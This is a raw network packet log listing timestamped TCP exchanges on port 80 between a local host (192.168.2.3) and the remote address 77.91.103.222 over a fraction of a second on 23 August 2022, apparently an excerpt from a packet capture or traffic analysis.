Aug 23, 2022 18:24:03.374041080 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.374057055 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.374073029 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.374089956 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.374102116 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.374104023 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.374106884 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.374119997 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.374136925 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.374156952 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.374162912 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.374166012 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.374167919 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.374186993 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.374206066 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.374212980 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.374216080 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.374228954 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.374243021 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.374259949 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.374277115 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.374285936 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.374289036 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.374321938 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.374339104 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.374356031 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.374363899 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.374366999 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.374368906 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.374382973 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.374404907 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.374418020 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.374422073 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.374435902 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.374439001 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.374454021 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.374471903 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.374485016 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.374631882 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.375936031 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.375957012 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.375973940 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376008987 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376013041 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376020908 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376038074 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376055002 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376071930 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376085043 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376087904 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376100063 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376116037 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376132011 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376147032 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376149893 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376159906 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376176119 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376193047 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376202106 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376204967 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376207113 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376220942 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376238108 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376255989 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376261950 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376265049 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376267910 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376281977 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376298904 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376315117 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376317978 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376319885 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376327991 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376343966 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376360893 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376378059 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376391888 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376394987 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376398087 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376410961 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376427889 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376444101 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376452923 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376456022 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376457930 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376461029 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376476049 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376492023 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376511097 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376516104 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376518965 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376533985 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376550913 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376568079 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376570940 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376574039 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376586914 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376604080 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376655102 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376658916 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376744032 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376763105 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376780033 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376796961 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376806974 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376811028 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376812935 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376826048 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376843929 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376861095 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376869917 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376873970 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376877069 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376878977 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376893044 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376913071 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376930952 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376940966 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376945019 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376946926 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.376964092 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376982927 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.376996994 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377002001 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377016068 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377033949 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377055883 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377069950 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377074003 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377077103 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377090931 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377108097 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377126932 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377145052 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377150059 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377152920 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377162933 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377181053 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377199888 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377218008 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377223015 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377224922 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377234936 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377268076 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377290964 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377304077 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377310038 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377314091 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377326965 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377346039 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377365112 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377387047 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377393961 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377410889 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377432108 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377449036 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377453089 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377454996 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377480030 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377499104 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377542973 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377557039 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377559900 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377573013 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377748013 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377778053 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377810955 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377832890 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377861977 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377868891 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377871990 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377888918 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377904892 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377922058 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377938986 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377954960 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377968073 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.377979040 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377981901 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377984047 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.377998114 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.378036022 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.378043890 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.378046989 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.378056049 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.378072977 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.378108025 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.378114939 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.378118992 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.378134966 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.378190994 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.378220081 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.378228903 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.378232002 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.378233910 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.378247023 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.378300905 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.378391981 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.378397942 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.379411936 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.379430056 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.379446983 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.379465103 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.379487991 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.379503012 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.379518986 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.379535913 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.379555941 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.379568100 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.379570961 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.379574060 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.379590034 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.379606009 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.379617929 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.379642963 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.379647017 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.379648924 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.380250931 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.380537987 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.380594015 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.381180048 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.381197929 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.381215096 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.381232023 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.381248951 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.381270885 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.381275892 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.381320953 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.381357908 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.381469965 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.391136885 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.394089937 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394139051 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394160986 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394182920 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394203901 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394226074 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394247055 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394268036 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394290924 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.394298077 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.394300938 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.394320965 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394341946 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394362926 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.394366980 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.394376040 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394397020 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394418001 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394438982 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394459963 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394470930 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.394474983 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.394478083 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.394496918 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394532919 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.394536972 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.394541025 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.394558907 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394582033 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394603014 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394624949 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394649982 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394658089 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.394661903 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.394665003 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.394666910 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.394702911 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394723892 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394738913 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.394743919 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.394947052 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394970894 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.394993067 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395008087 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395010948 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395020962 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395042896 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395064116 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395078897 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395082951 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395100117 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395122051 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395143032 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395169020 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395180941 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395185947 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395196915 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395219088 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395241022 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395262003 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395266056 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395272970 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395294905 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395318031 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395330906 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395334959 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395358086 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395360947 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395401955 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395423889 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395447016 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395467997 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395484924 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395489931 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395493031 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395505905 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395528078 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395549059 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395570040 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395581961 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395586014 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395589113 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395607948 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395629883 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395651102 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395654917 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395658016 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395665884 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395682096 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395698071 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395720005 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395740986 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395761967 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395795107 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395804882 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395808935 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395812035 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395821095 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395847082 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395854950 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.395875931 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.395898104 CEST	80	49844	77.91.103.222	192.168.2.3
